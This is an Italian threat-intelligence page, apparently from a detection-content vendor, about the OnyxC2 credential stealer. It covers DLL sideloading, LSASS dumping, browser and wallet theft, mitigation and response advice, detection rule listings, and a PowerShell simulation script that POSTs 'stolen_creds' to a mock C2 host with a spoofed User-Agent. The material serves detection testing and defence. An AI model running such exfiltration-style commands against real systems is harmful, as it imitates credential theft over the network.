Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
OnyxC2 è un nuovo malware-as-a-service stealer progettato per colpire credenziali, estensioni di autenticazione a due fattori e portafogli di criptovalute in circa 210 applicazioni. La piattaforma offre un toolkit completo in stile commerciale, inclusi un pannello di gestione, un builder e funzionalità di accesso remoto. Si basa anche su metodi di evasione avanzati, tra cui il sideloading di DLL con binari firmati di grandi dimensioni e componenti di payload crittografati.
Indagine
I ricercatori di BlackFog hanno esaminato più campioni di OnyxC2 e hanno scoperto un metodo di sideloading di DLL che sfrutta un eseguibile host firmato insieme a una DLL dannosa di oltre 120 MB mascherata come una libreria grafica NVIDIA. L’analisi della rete ha mostrato il malware comunicare tramite HTTPS con un endpoint API di backend specifico. I ricercatori hanno anche trovato overlay crittografati incorporati nella DLL, aiutando il malware a evitare un’analisi statica diretta.
Mitigazione
Implementare controlli di anti-esfiltrazione dei dati al punto finale può aiutare a bloccare il traffico in uscita non autorizzato indipendentemente dal processo utilizzato. I team di sicurezza dovrebbero monitorare i caricamenti sospetti di DLL associati a binari firmati e indagare su file insolitamente grandi che compaiono nei percorsi scrivibili dagli utenti. Sono anche raccomandate politiche di controllo applicativo rigorose e il monitoraggio di attività programmate non autorizzate.
Risposta
Se viene rilevata attività di OnyxC2, isolare immediatamente il sistema colpito per fermare ulteriori furti di dati. Catturare un dump completo della memoria per recuperare il payload decrittografato e verificare la presenza di sessioni HVNC attive o attività proxy SOCKS5. Rivedere tutte le attività programmate create di recente e ispezionare gli archivi delle credenziali del browser per evidenze di compromissione.
graph TB %% Definizione delle classi classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Accesso iniziale ed esecuzione action_user_exec[“<b>Azione</b> – <b idea=’T1204.002’>Esecuzione da parte dell’utente: File dannoso</b><br/>Descrizione: Le vittime vengono indotte a scaricare<br/>archivi protetti da password contenenti<br/>installer malevoli mascherati da software legittimo.”] class action_user_exec action action_side_loading[“<b idea=’T1574.002’>Hijack del flusso di esecuzione: DLL Side-Loading</b><br/>Descrizione: Utilizza un eseguibile legittimo e firmato digitalmente<br/>per caricare una DLL malevola e gonfiata<br/>denominata borlndmm.dll.”] class action_side_loading action malware_dll[“<b idea=’T1027.001’>File o informazioni offuscati: Padding binario</b><br/>Descrizione: La DLL viene gonfiata a oltre 120 MB con<br/>funzioni grafiche NVIDIA legittime per<br/>eludere gli scanner di sicurezza.”] class malware_dll malware %% Persistenza e comando e controllo action_persistence[“<b idea=’T1547’>Persistenza</b><br/>Descrizione: Utilizza funzionalità opzionali di<br/>esecuzione automatica tramite attività pianificate.”] class action_persistence action action_c2[“<b idea=’T1071.001’>Comando e Controllo: Protocollo a livello applicativo</b><br/>Descrizione: Comunicazione periodica con il backend tramite HTTPS su<br/>/backend/api/app.php, spesso utilizzando Cloudflare<br/>come fronting per una maggiore furtività.”] class action_c2 action %% Ricognizione e accesso alle credenziali action_discovery[“<b idea=’T1217’>Ricognizione</b><br/>Descrizione: Raccoglie informazioni dai browser, incluse<br/>credenziali salvate e cookie da 45 differenti browser<br/>basati su Chromium e Gecko.”] class action_discovery discovery action_cred_mgr[“<b idea=’T1555.005’>Accesso alle credenziali: Credenziali dei gestori di password</b><br/>Descrizione: Prende di mira 5 diverse applicazioni di gestione<br/>delle password per sottrarre credenziali.”] class action_cred_mgr discovery action_lsass[“<b idea=’T1003.001’>Accesso alle credenziali: Dump delle credenziali del sistema operativo</b><br/>Descrizione: Esegue il dump della memoria LSASS per ottenere<br/>credenziali.”] class action_lsass discovery %% Esfiltrazione action_exfil[“<b idea=’T1041’>Esfiltrazione tramite canale C2</b><br/>Descrizione: I dati rubati, comprese password, cookie<br/>e informazioni sui wallet, vengono caricati tramite la<br/>richiesta action=up_d.”] class action_exfil exfiltration %% Flusso delle connessioni action_user_exec –>|porta_a| action_side_loading action_side_loading –>|utilizza| malware_dll malware_dll –>|stabilisce| action_persistence action_persistence –>|avvia| action_c2 action_c2 –>|attiva| action_discovery action_discovery –>|porta_a| action_cred_mgr action_discovery –>|porta_a| action_lsass action_cred_mgr –>|fornisce_dati_per| action_exfil action_lsass –>|fornisce_dati_per| action_exfil action_exfil –>|comunica_tramite| action_c2
Flusso di attacco
Rilevamenti
Comando e Controllo Sospetto tramite Richiesta DNS da Dominio Top Level (TLD) Insolito (via DNS)
Visualizza
IOC (HashSha256) per rilevare: All’interno di OnyxC2: Il Nuovo Stealer che Colpisce 210 App
Visualizza
IOC (SourceIP) per rilevare: All’interno di OnyxC2: Il Nuovo Stealer che Colpisce 210 App
Visualizza
IOC (DestinationIP) per rilevare: All’interno di OnyxC2: Il Nuovo Stealer che Colpisce 210 App
Visualizza
Rilevamento della Comunicazione C2 di OnyxC2 Stealer e Anonimizzazione TOR [Proxy]
Visualizza
Rilevamento di Autorun di Attività Programmata e Attività Keylogger di OnyxC2 [Creazione Processi Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e puntare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa di Attacco e Comandi: L’avversario cerca di esfiltrare credenziali del browser rubate. Per evitare il rilevamento da parte del monitoraggio della sicurezza di rete, distribuiscono un binario Tor portatile per creare un tunnel anonimizzato. Una volta stabilito il tunnel, il malware avvia una connessione al suo server di Comando e Controllo (C2). Per mimetizzarsi con il traffico web legittimo, il malware finge il suo User-Agent per apparire come “Cloudflare” e prende di mira un endpoint API specifico ospitato dietro un proxy Cloudflare. Questa sequenza è progettata per attivare la correlazione della regola di rilevamento
torargomenti da riga di comando e la specifica/backend/api/app.phpmodello URL. -
Script di Test di Regressione:
# Simulazione della Comunicazione OnyxC2 Stealer # 1. Simulare la presenza di Tor (Creando un file/processo fittizio) # In uno scenario reale, sarebbe il vero tor.exe $TorPath = "$env:TEMPtor.exe" "Contenuto Simulato del Binario Tor" | Out-File -FilePath $TorPath # Creare un evento di esecuzione processo per 'tor' attraverso la riga di comando Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Per assicurarsi che la logica di rilevamento 'command_line|contains: tor' venga colpita, # eseguiamo un comando che include la stringa 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Simulare la Connessione di Rete C2 # Usiamo PowerShell per simulare una connessione di rete con l'URL specifico e User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Attempting C2 communication to $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Comandi di Pulizia:
# Rimuovere gli artefatti simulati Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Pulizia simulazione completata."